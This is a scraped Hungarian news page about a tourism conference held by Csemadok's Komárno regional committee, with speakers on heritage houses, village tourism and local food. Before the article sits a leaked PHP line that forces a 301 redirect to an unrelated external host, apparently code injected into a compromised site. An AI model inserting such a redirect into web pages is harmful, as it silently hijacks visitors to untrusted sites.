header("Location: http://sstellar.host/300.php", true, 301); exit(); ?> Turisztikai konferencia a Csemadok szervezésében
hétfő, május 27, 2019

Keresés

Turisztikai konferencia a Csemadok szervezésében

2813Nyitra megye támogatásának köszönhetően már hagyományosan ősszel rendezi turisztikai konferenciáját a Csemadok Komáromi Területi Választmánya.

Petheő Attila elnök kifejtette, a Csemadok feladata, hogy a helyi és magyar lehetőségekre hívja fel azok figyelmét, akik itthon szeretnének lenni a Komáromi járásban. Elmondása szerint feladatuknak tekintik a régióban, hogy minden körülmények között a sajátjaikat, a magukfajtát preferálják, ha előadók meghívásáról, gasztronómiáról, szálláshelyek ajánlásáról van szó.

Zsok Gizella, a Pro Futuro Villa Kezw vezetője előadásában egy jól átgondolt, hosszú távú értékmentő programmal ismertette meg a hallgatóságot. Bátorkeszin a tájház kialakítása egy eszköz arra, hogy emlékeiket, hagyományaikat átörökítsék és egy olyan közösségi teret hozzanak létre, ahol mindenki jól érzi magát.

Bauer Ildikó, a Dunamente TDM ügyvezető igazgatója más irányból világított rá a közös munka szükségességére. Szerveződésük célja, hogy a régió községei és szervezetei között kapocsként működjenek annak érdekében, hogy eladhatóvá tehessék a régiót az idelátogatók számára.

Szobiné Kerekes Eszter, a Kultúráért és Turizmusért Társulás elnöke mögött két évtizedes munka áll, aminek egyik legnagyobb sikere a búcsi Népviseletes Babák Háza. A járásban családjával elsők között kezdtek fantáziát látni a falusi turizmusban, mikor megálmodták az Emese Panziót, a kovászként működő Emese Udvarházi Napokat és a Népviseletes Babák Házát.

A Csemadok Területi Választmányának titkára, Vass Laura, a vassfazek.sk oldal működtetője és a hagyományos gasztronómiai értékek ápolója előadásában arra mutatott rá, hogy van módunk egészségesen étkezni, úgy, hogy helyi termelőktől vásárolt alapanyagokból, helyi ízeket főzünk a családnak. A konferencia ételkóstolóval zárult.

Minden jog fenntartva, Szlovákiai Magyar Közgazdász Társaság, 2010
A honlap a Corvinus Támogatásközvetítő és Tőkebefektetési Zrt. támogatásával készült. Created: namedia